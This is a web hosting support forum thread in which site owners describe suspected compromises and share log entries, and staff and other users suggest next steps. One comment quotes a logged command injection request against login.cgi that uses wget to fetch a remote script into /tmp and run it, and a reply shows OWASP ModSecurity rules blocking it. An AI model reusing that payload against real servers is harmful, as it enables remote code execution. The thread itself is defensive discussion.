Skip to main content

Comments

11 comments

Date Votes
  • sktest123
    sort of command injection, via php cgi query string, seems trying to download remote shell script to tmp and execute it.
    0
  • cPanelMichael
    Hello, The previous post includes an accurate description of what it looks attack was attempting to do. Let us know if you have additional questions. Thank you.
    0
  • webstuff
    There was a security issue with a php file and tmp files were being deleted.. I'm not sure if this helps any.. Uptime: 123 seconds Executable: /usr/bin/php Command Line (often faked in exploits): /usr/bin/php Network connections by the process (if any): tcp: 127.0.0.1:33596 -> 127.0.0.1:3306 tcp: 127.0.0.1:33598 -> 127.0.0.1:3306 Files open by the process (if any): /usr/local/apache/logs/error_log /usr/local/apache/logs/error_log /tmp/.ZendSem.gYLBCK (deleted) /tmp/ZCUDi4colR (deleted) I have more of the log too. Any other ideas or suggestions on where to look ? I see they are trying to connect... They tried to connect 30 times today too.
    0
  • cPanelMichael
    There was a security issue with a php file and tmp files were being deleted..

    Hello, Can you expand on this statement? For instance, did you remove the PHP file and confirm the issue persists? Thank you.
    0
  • webstuff
    Hello, Can you expand on this statement? For instance, did you remove the PHP file and confirm the issue persists? Thank you.

    Yes I did remove the php hole or at least I believe I did. So far I haven't seen any funky stuff but I have seen this. The only other question I have with this is.. Do you think there is any chance they could have gotten my mysql database login? In other words. When you see this sort of log I assume you wouldn't need the mysql password username correct? Or is there a possibilty. Also I can provide whatever else if you would like too. I do have some of the orgrinal files for some items. (The entire website was a complete mess. I had contacted my hosting provider talked to the security team and they kept telling me I had nothing to worry about but I just didn't buy that so this is sort of a learning experience for me too. After I started removing the stuff I stopped getting high server alerts other alerts etc..) But I do see connections like that in my mod security. Just want to be 110% sure I am not missing anything. Also I did happen to find some advance malware link I believe to where it installs a virus in the firm I believe. And if I understand everything correctly its one of those where if you wipe the drive complete format it still stays on the system. Plus there were open folders public keys etc.. I do not believe anything got changed but then again from my newbie side of details I always could be missing something. There is other stuff that isn't going on which gives me the reason to believe I got it too. I will gladly pm any details too. Thank you again so much for the help. Thank you again.
    0
  • cPanelMichael
    Hello @webstuff, It's difficult to know for sure the extent at which the attacker was able to gain access to your website's files and passwords (assuming they were stored in a PHP configuration file). For additional investigation, it's generally a good idea to consult with a qualified system administrator. We provide a list of companies offering system administration services at: Additionally, we provide some more information about our Technical Support Department's ability to troubleshoot issues stemming from a hacked server at: Thank you.
    0
  • webstuff
    Yes I removed the files. In mod security its showing they where trying to connect to 127.0.0.1 Can anyone point me in the right direction on this? Its showing blocked each time.. Or any thoughts at all?
    0
  • webstuff
    ok just saw that I looked into that. haha actually some top people were hired and they said they saw nothing and it was nothing to worry about. They though it was email or some other files which clearly wasn't correct. I am glad I kept investigating. I will keep you posted.
    0
  • webstuff
    Just so everyone knows after digging around. I found out that there was a php script that was compromised. Turns out that the one version of php when you get it to crash correctly with the mysql it would then show the login for mysql so then hacker used the cross scripting X-fra,e options X content http strict transport etc... So they would make there script
    0
  • TheGrumpyOne
    Hello, I am finding this string in my log file. "GET /login.cgi?cli=aa%20aa%27;wget%20http://1.2.3.4/d%20-O%20-%3E%20/tmp/.shinka;sh%20/tmp/.shinka%27$ I've been getting these the last 3 weeks. Has anyone come up with a way to block this? I have OWASP, but I'm a noob when it comes to writing rules and don't want to screw things up. Thanks in advance for the Help!
    0
  • fuzzylogic
    You should not need to write rules for requests like these. I would expect the OWASP CRS to block requests like this if it is set up properly and working. In my test using cPanel provided rules OWASP ModSecurity Core Rule Set V3.0 SpiderLabs OWASP curated ModSecurity rule set This request triggered the remote command injection rule ids 932105 and 932115 scoring 5 anomaly points each. The 10 anomaly points triggered blocking rule id 949110 Message: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. The 10 anomaly points triggered logging rule id 980130 Message: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=10,PHPI=0,HTTP=0,SESS=0) Remote Command Execution: Windows Command Injection">
    0

Please sign in to leave a comment.

Didn't find what you were looking for?

New post